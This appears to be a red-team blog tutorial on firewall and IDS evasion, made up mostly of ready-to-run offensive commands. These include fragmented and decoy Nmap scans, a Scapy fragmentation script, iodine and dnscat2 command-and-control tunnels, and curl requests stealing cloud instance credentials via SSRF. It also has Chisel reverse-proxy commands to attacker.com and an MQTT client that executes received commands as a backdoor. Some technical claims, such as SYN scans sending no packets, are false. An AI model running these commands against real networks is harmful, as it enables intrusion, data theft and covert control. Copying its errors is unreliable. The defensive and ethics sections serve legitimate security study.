Firewall Bypass Techniques: Tools and Best Practices

As a red teamer or pen tester, you must be prepared to face firewalls that protect the target network. Firewalls are the first line of defense against unauthorized access, and they are designed to restrict incoming and outgoing network traffic. However, these restrictions can be bypassed using different techniques and tools, and this is where you come in. In this article, we will explore some of the most effective firewall bypass techniques and best practices that you can use to penetrate your target network.

For complementary reading on network security bypass techniques, see our coverage of advanced network security and IPS evasion and IoT security vulnerabilities.

Firewall Basics

#

Before we dive into the techniques, let’s first understand what a firewall is and how it works. A firewall is a network security device that monitors and controls incoming and outgoing network traffic based on a set of predefined rules. The firewall can be either a software or hardware device that sits between the internal network and the external network (usually the Internet).

Firewalls can be configured to block or allow traffic based on the source IP address, destination IP address, port number, protocol, and other criteria. For example, a firewall may be configured to block all traffic from a specific IP address or only allow traffic on specific ports. Firewalls can also be configured to use different security policies for different types of traffic.

Firewalls can be classified into three main types: packet filtering, stateful inspection, and application-layer.

1. Packet Filtering Firewalls: These are the simplest and earliest form of firewall. They examine the packet header and decide whether to block or allow traffic based on the source and destination IP addresses, ports, and protocols. Packet filtering firewalls are easy to configure and operate, but they are not very effective against more sophisticated attacks.
2. Stateful Inspection Firewalls: These firewalls keep track of the state of network connections and allow or block traffic based on the state information. Stateful inspection firewalls are more effective than packet filtering firewalls because they can distinguish between legitimate traffic and traffic that is part of an ongoing attack.
3. Application-layer Firewalls: These firewalls operate at the application layer of the network stack and can examine the contents of network packets to decide whether to allow or block traffic. Application-layer firewalls are the most sophisticated type of firewall and can detect and block many types of attacks, but they are also the most complex and resource-intensive.

Now that we have an understanding of firewalls let’s dive into some techniques that you can use to bypass them.

Techniques for Firewall Bypass

#

Port Scanning

#

Port scanning is the process of scanning a target system or network for open ports. A port is a logical connection point through which a computer communicates with another computer or network device. Each port is assigned a unique number, and different applications use different ports to communicate. For example, the HTTP protocol uses port 80, and the HTTPS protocol uses port 443.

Firewalls can be configured to block incoming traffic on specific ports. Therefore, scanning for open ports can help you identify open ports that you can use to bypass the firewall. There are several tools available for port scanning, including Nmap, Masscan, and Zmap.

Example:

#!/bin/bash
set -euo pipefail

nmap -p 1-65535 -sV -sS -T4 target_ip_address

This command will scan all the ports (1-65535) of the target IP address and attempt to determine the service and version running on each open port.

Advanced Evasion: Fragmentation and MTU Manipulation

#

Simple port scans are easily detected. To bypass Intrusion Detection Systems (IDS) and poorly configured firewalls, we can fragment our packets. If a firewall doesn’t reassemble packets before inspection (stateless), it might let the fragments through, assuming the destination host will handle reassembly.

Nmap Fragmentation:

The -f option splits the IP header into tiny fragments.

# Split packets into 8-byte fragments
nmap -f -sS target_ip

# Split into 16-byte fragments (more evasion)
nmap -ff -sS target_ip

# Custom MTU (Maximum Transmission Unit)
nmap --mtu 24 -sS target_ip

Fragroute:

For more control, fragroute intercepts, modifies, and rewrites egress traffic. It can perform fragmentation, overlap, and timing attacks.

# Configure fragroute.conf
ip_frag 8
ip_chaff dup
order random
print

# Run fragroute to target
fragroute -f fragroute.conf target_ip

Decoy Scanning

#

If you can’t be invisible, be noisy. Decoy scanning (-D) spoofs scans from other IP addresses mixed with your own. The firewall sees traffic from 10 different IPs, making it hard to attribute the scan to you or block your specific IP without blocking legitimate hosts.

# Scan with decoys RND (Random) or specific IPs
nmap -D RND:10,192.168.1.5,10.0.0.1 -sS target_ip

Custom Packet Crafting with Scapy

#

Tools like Nmap have signatures. For a truly stealthy bypass, you build your own packets using Python and Scapy. This allows you to set specific flags, sequence numbers, and options that standard tools don’t.

from scapy.all import *

# Craft a TCP SYN packet with custom options
ip = IP(dst="192.168.1.100")
tcp = TCP(sport=RandShort(), dport=80, flags="S", seq=12345)
payload = "GET / HTTP/1.0\r\n\r\n"

# Fragment the packet manually
frags = fragment(ip/tcp/payload, fragsize=16)

# Send fragments
for f in frags:
    send(f)

This script creates a custom TCP handshake initiation and fragments it before sending, giving you granular control over the wire-level behavior.

Protocol Tunneling

#

Protocol tunneling involves encapsulating traffic in another protocol to bypass firewalls that block the original protocol.

DNS Tunneling (Iodine & Dnscat2)

#

DNS is often allowed through firewalls because internal systems need to resolve domain names.

Iodine: Iodine tunnels IPv4 data through DNS. It requires a domain you control and a server running the iodine daemon.

# Server Side
iodined -f -c -P password 10.0.0.1 t.mydomain.com

# Client Side
iodine -f -P password t.mydomain.com

Dnscat2: Dnscat2 is a C2-focused tool that creates an encrypted command-and-control channel over the DNS protocol.

# Server
ruby ./dnscat2.rb --dns domain=c2.example.com

# Client
./dnscat --dns domain=c2.example.com

ICMP Tunneling

#

If ping (ICMP Echo Request) is allowed, you can tunnel data inside the payload section of ICMP (Internet Control Message Protocol) packets. Tools like Hans or ICMPTX are perfect for this.

Hans (IP over ICMP):

# Server (needs root)
hans -s 10.1.2.0 -p password

# Client
hans -c server_ip -p password

This creates a virtual network interface (tun0) on both ends. You can then SSH or browse through this interface.

SSH Dynamic Port Forwarding (SOCKS Proxy)

#

If you have SSH access to a host inside the network (or on the edge), you don’t need VPN software. SSH can act as a SOCKS proxy.

# Create a SOCKS proxy on localhost:1080
ssh -D 1080 -N -f user@pivot_host

Then configure your browser or tools (like ProxyChains) to use 127.0.0.1:1080.

ProxyChains Configuration (/etc/proxychains4.conf):

[ProxyList]
socks5 127.0.0.1 1080

Now, every tool you run with proxychains will tunnel through the SSH connection. proxychains nmap -sT -p 445 192.168.1.0/24

Application Layer Protocol Manipulation

#

Application layer protocol manipulation involves manipulating the application layer protocol to bypass the firewall. For example, you can use HTTP smuggling to bypass a firewall that blocks HTTP traffic. HTTP smuggling involves manipulating the HTTP protocol to make the firewall think that the traffic is legitimate HTTP traffic.

There are several tools available for HTTP smuggling, including Burp Suite and HTTPTunnel.

Example:

To use Burp Suite for HTTP smuggling, you can follow these steps:

1. Set up Burp Suite as a proxy server and configure your browser to use the proxy server.
2. Send an HTTP request to the target system using Burp Suite.
3. Modify the request to include a payload that is not recognized by the firewall.
4. Send the modified request to the target system.
5. Use Burp Suite to intercept and modify the response from the target system to include the payload.

Cloud Firewall Evasion (AWS/Azure/GCP)

#

Cloud firewalls (Security Groups) operate differently than traditional perimeter firewalls. They are often “default deny” but can have misconfigured trust relationships.

Instance Metadata Service (IMDS) Abuse: If you have SSRF (Server-Side Request Forgery) on a cloud instance, you can query the internal metadata service to steal credentials or enumerate the network configuration, bypassing external firewalls.

# AWS IMDSv1 (Legacy)
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

# AWS IMDSv2 (Token Required)
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/

Domain Fronting: This technique uses a CDN (Content Delivery Network) like Cloudflare or CloudFront to hide your true C2 destination.

1. The firewall sees a connection to allowed-cdn.com (trusted).
2. The Host header in the HTTP request actually points to malicious-c2.com.
3. The CDN routes the request to your backend.

This requires the CDN to host both domains, but it makes your traffic look like legitimate web browsing to a high-reputation domain.

Encrypted Communication

#

Encrypted communication involves using encryption to protect the traffic from being intercepted by the firewall. If the firewall cannot decrypt the traffic, it will not be able to block it.

There are several tools available for encrypted communication, including OpenVPN, PPTP, and L2TP.

Example:

To use OpenVPN for encrypted communication, you can follow these steps:

1. Set up an OpenVPN server on a system that is not blocked by the firewall.
2. Install the OpenVPN client on your system.
3. Connect to the OpenVPN server using the client.
4. Once the connection is established, all the traffic between your system and the OpenVPN server will be encrypted and will not be blocked by the firewall.

Real-World Case Study: The “Unreachable” C2

#

The Target: A highly secure manufacturing network. No direct internet access. All outbound traffic goes through an authenticated proxy with strict category filtering.

The Challenge: We landed a phishing payload on a workstation, but it couldn’t call back to our Command & Control (C2) server.

The Bypass:

1. Reconnaissance: We used PowerShell to check proxy settings (Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings").
2. Protocol Analysis: We discovered that while HTTP/HTTPS was inspected, the proxy allowed CONNECT requests to port 443 on any domain classified as “Finance”.
3. Domain Categorization: We bought an expired domain that was previously categorized as “Financial Services” by major vendors (BlueCoat, McAfee).
4. The Tunnel: We configured our C2 to use this domain. The malware used the system’s default proxy credentials SSO (Single Sign-On) to authenticate and sent a CONNECT c2-finance.com:443 request.
5. Success: The proxy saw an encrypted tunnel to a trusted financial site and let it pass. We established a stable C2 channel over HTTPS.

Lesson: Firewalls trust categories and reputation. Manipulating these is often easier than finding a technical exploit in the firewall appliance itself.

Advanced IDS/IPS Evasion Strategies

#

Intrusion Detection Systems (Snort, Suricata, Zeek) look for signatures. Here is how to break them.

Timing Attacks

#

IDS often have a state timeout. If you send the first half of a malicious payload, wait 60 seconds, and then send the second half, the IDS might have forgotten the first half. Nmap Timing: nmap -T0 (Paranoid) sends packets very slowly (one every 5 minutes), bypassing almost all rate-based detection.

Session Splicing (Whisker)

#

This involves fragmenting the data at the application layer. For a web attack, instead of sending GET /etc/passwd, you send it in multiple packets: GET /, etc, /pa, sswd. The IDS must reassemble the stream perfectly to catch this. Tools like Whisker (legacy) or custom Python scripts can achieve this.

Invalid Checksum Injection

#

Send packets with a bad TCP checksum that contain “attack” data.

1. The IDS (operating in promiscuous mode) sees the packet and alerts.
2. The target OS (which enforces TCP standards) drops the packet because the checksum is invalid.
3. You then send the real benign packet. The IDS thinks an attack happened, but the target was never touched. This creates noise and false positives, exhausting the analysts.

TTL (Time To Live) Evasion

#

If you know the exact hop count to the target (say, 10 hops), you can send a packet with TTL=9 containing junk data.

1. The IDS (which is closer, say 5 hops away) sees the packet and processes it.
2. The packet dies at hop 9 before reaching the target.
3. You follow up with the real packet with TTL=11. The IDS sees both and might get confused during reassembly, while the target only sees the valid packet.

Best Practices

#

Use a VPN

#

Using a VPN can help you bypass firewalls by encrypting your traffic and routing it through a server that is not blocked by the firewall. There are several VPN services available, including NordVPN NordVPN, ExpressVPN ExpressVPN, and Private Internet Access Private Internet Access.

Use Stealth Techniques

#

Stealth techniques involve using techniques that are designed to evade detection. For example, you can use tools like Nmap and Masscan with the “-sS” flag to perform stealth scans that do not send any packets to the target system.

Use Port Forwarding

#

Port forwarding involves forwarding traffic from one port to another. For example, you can forward traffic from port 80 to port 443 to bypass a firewall that blocks traffic on port 80. There are several tools available for port forwarding, including SSH and Netcat.

Advanced Firewall Bypass Techniques

#

Next-Generation Firewall Evasion

#

Modern NGWFs incorporate deep packet inspection, application-layer filtering, and machine learning. Here are advanced evasion techniques:

Protocol Confusion Attacks

#

# HTTP Parameter Pollution - Use only with explicit authorization
curl "http://target.com/page.php?param1=value1&param1=value2"

# HTTP Request Smuggling - Only for authorized testing environments
# Use Burp Suite or custom tools to create malformed requests

Machine Learning Bypass

#

• Pattern Variation: Alter payload structures to avoid ML detection
• Timing Attacks: Introduce random delays to break behavioral patterns
• Encryption Obfuscation: Use custom encryption to hide malicious traffic

Cloud Firewall Considerations

#

AWS Security Groups and NACLs

#

# Enumerate security groups - Only on authorized cloud accounts
aws ec2 describe-security-groups --region us-east-1

# Identify overly permissive rules - Use for security assessment only
aws ec2 describe-security-groups --filters Name=ip-permission.cidr,Values=0.0.0.0/0

Azure NSG Bypass

#

# PowerShell Azure enumeration - Requires appropriate Azure permissions
Get-AzNetworkSecurityGroup | Select-Object Name, ResourceGroupName

GCP Firewall Rules

#

# GCP firewall enumeration - Only with explicit GCP access authorization
gcloud compute firewall-rules list

Industrial Control System (ICS) Firewalls

#

ICS environments present unique bypass challenges:

SCADA Protocol Tunneling

#

# Modbus over DNS tunneling - Only in controlled ICS environments with permission
# Use dnscat2 or iodine for SCADA protocol encapsulation
iodine -f -P password subdomain.company.com

PLC Exploitation

#

• Default Credentials: Many ICS devices ship with known default passwords
• Legacy Protocol Vulnerabilities: DNP3, Modbus, and IEC 60870-5-104 often unencrypted
• Supply Chain Attacks: Compromise vendor update mechanisms

Mobile and IoT Firewall Bypass

#

Mobile Carrier Firewalls

#

# MMS tunneling for mobile data exfiltration
# Use custom APNs or SMS protocols for command channels

IoT Device Exploitation

#

# MQTT protocol abuse for IoT networks - Only with explicit authorization
# Security Note: This demonstrates potential abuse; never deploy in production
import paho.mqtt.client as mqtt

def on_connect(client, userdata, flags, rc):
    client.subscribe("iot/commands")

def on_message(client, userdata, msg):
    # Execute received commands - Never use exec() with untrusted input in real code
    exec(msg.payload.decode())

client = mqtt.Client()
client.on_connect = on_connect
client.on_message = on_message
client.connect("iot-broker.company.com", 1883, 60)
client.loop_forever()

Real-World Firewall Bypass Case Studies

#

DNS Tunneling Attack (2019)

#

A financial services organization fell victim to DNS tunneling used for data exfiltration:

• Initial Access: Attacker compromised a workstation through phishing
• Command Channel: Used DNScat2 to establish DNS tunneling for C2 communications
• Data Exfiltration: Exfiltrated sensitive financial data over DNS queries, bypassing firewall egress rules
• Detection: Eventually caught when abnormal DNS query volumes triggered monitoring alerts

HTTP Tunneling for Corporate Espionage (2022)

#

State-sponsored actors targeted a technology company using HTTP tunneling techniques:

• Initial Access: Spear-phishing campaign delivered malware to executives
• Protocol Tunneling: Used HTTPTunnel to encapsulate RDP traffic within HTTP requests
• Firewall Evasion: HTTP traffic appeared legitimate to web application firewalls
• Impact: Persistent access maintained for 6+ months before detection

Port-Based Firewall Evasion in Penetration Testing (Ongoing)

#

Red team engagements regularly demonstrate port-based firewall bypass:

• Port Scanning: Using fragmented packets with tools like Nmap to evade detection
• Service Spoofing: Crafting packets that appear to belong to allowed services
• Stateful Bypass: Exploiting firewall state tracking limitations with ACK floods
• Lesson: Most successful bypasses exploit misconfigurations rather than firewall flaws

Firewall Bypass Detection and Prevention

#

Blue Team Strategies

#

Network Telemetry

#

# Enable firewall logging - Part of defensive monitoring strategy
iptables -A INPUT -j LOG --log-prefix "FIREWALL: "

# Monitor for unusual patterns - Essential for detecting bypass attempts
tail -f /var/log/syslog | grep "FIREWALL"

IDS/IPS Integration

#

# Snort rule for tunneling detection - Deploy as part of comprehensive defense
alert tcp any any -> any 53 (msg:"DNS Tunneling Detected"; content:"|01|"; threshold:type limit, track by_src, count 5, seconds 60;)

Behavioral Analysis

#

• Traffic Pattern Anomalies: Unusual protocol combinations
• Volume Spikes: Sudden increases in encrypted traffic
• Timing Analysis: Regular beaconing patterns

Red Team Countermeasures

#

OPSEC Considerations

#

• Traffic Shaping: Vary connection patterns to avoid detection
• Domain Fronting: Use CDN domains to hide C2 traffic
• Protocol Hopping: Switch protocols to evade signature-based detection

Tool Selection

#

• Living-Off-The-Land: Use built-in system tools when possible
• Custom Malware: Develop unique signatures to avoid generic detection
• Multi-Stage Payloads: Use loaders to bypass initial access restrictions

Future of Firewall Technology

#

AI-Powered Firewalls

#

Machine learning will revolutionize firewall capabilities:

• Predictive Blocking: AI anticipates attack patterns before execution
• Contextual Analysis: Understands user behavior and application context
• Automated Response: Self-adapting rules based on threat intelligence

Zero-Trust Architecture

#

The future of network security moves beyond perimeter defenses:

• Micro-Segmentation: Every connection requires verification
• Continuous Authentication: Session validation throughout connection lifetime
• Least Privilege: Minimal access principles applied universally

Quantum-Resistant Encryption

#

Post-quantum cryptography will impact firewall bypass techniques:

• Algorithm Migration: Transition from RSA/ECDSA to quantum-resistant algorithms
• Key Size Increases: Larger keys require more processing power
• Protocol Evolution: New standards like TLS 1.3 with PQ extensions

Legal and Ethical Considerations

#

Authorization Requirements

#

• Explicit Permission: Documented approval for all testing activities
• Scope Limitations: Clearly defined boundaries and exclusions
• Impact Assessment: Evaluate potential disruption to business operations

Responsible Disclosure

#

• Vulnerability Reporting: Follow proper disclosure procedures
• Coordinated Disclosure: Work with vendors and organizations
• Public Awareness: Share findings to benefit the broader community

Professional Standards

#

• Methodology Documentation: Detailed records of techniques and tools used
• Chain of Custody: Maintain integrity of collected evidence
• Confidentiality: Protect sensitive information discovered during testing

Deep Dive: Pivoting and Port Forwarding

#

Once you compromise a host behind the firewall, you need to use it to reach deeper into the network.

Local Port Forwarding (ssh -L): Forwards a port on your local machine to a port on the remote target. ssh -L 8080:internal-web.corp:80 user@pivot-host Accessing localhost:8080 now hits the internal web server.

Remote Port Forwarding (ssh -R): Forwards a port on the remote machine back to your local machine. Essential for catching reverse shells through a NAT/Firewall. ssh -R 4444:localhost:4444 user@pivot-host If the pivot host receives a connection on 4444, it is forwarded to your listener.

Chisel (Advanced SOCKS/Tunneling): Chisel is the modern standard for red team tunneling. It works over HTTP, is encrypted via SSH, and supports reverse tunnels.

Server (Attacker): ./chisel server -p 8000 --reverse

Client (Victim): ./chisel client attacker.com:8000 R:socks

This creates a reverse SOCKS proxy. You can now scan the internal network from your C2 server using proxychains.

Ligolo-ng: Ligolo-ng is a TUN-interface based tunneling tool (written in Go) that is often faster and more stable than SOCKS proxies for handling Nmap scans and heavy traffic. It creates a full VPN-like layer 3 tunnel.

Conclusion

#

Firewall bypass techniques represent the cutting edge of network penetration testing and red team operations. As defensive technologies evolve, so too must our offensive methodologies. The techniques discussed in this comprehensive guide—from basic port scanning to advanced AI evasion—provide a solid foundation for understanding and executing effective firewall bypass operations.

However, mastery of these techniques requires not just technical knowledge, but also deep understanding of network protocols, firewall architectures, and defensive strategies. Real-world application demands careful planning, meticulous execution, and thorough documentation.

Remember that firewall bypass is not about defeating security entirely, but about identifying weaknesses that can be addressed to improve overall security posture. Ethical hackers and red teamers play a crucial role in this process by helping organizations understand their true security state and implement effective countermeasures.

The future of firewall bypass will likely involve more sophisticated techniques leveraging AI, machine learning, and emerging technologies. Staying ahead requires continuous learning, experimentation, and adaptation to new defensive paradigms.

Use these techniques responsibly, ethically, and with proper authorization. The goal is not destruction, but improvement—helping organizations build more resilient security postures that can withstand real-world threats.

Happy hunting, and may your firewall bypass operations be both successful and educational!

References

#

• Nmap Firewall Bypass Techniques
• HackTricks - Firewall and IDS/IPS Evasion
• Chisel - TCP/UDP Tunneling
• Ligolo-ng - Advanced Tunneling
• Iodine - DNS Tunneling
• Dnscat2 - DNS C2
• Scapy Documentation
• Fragroute Documentation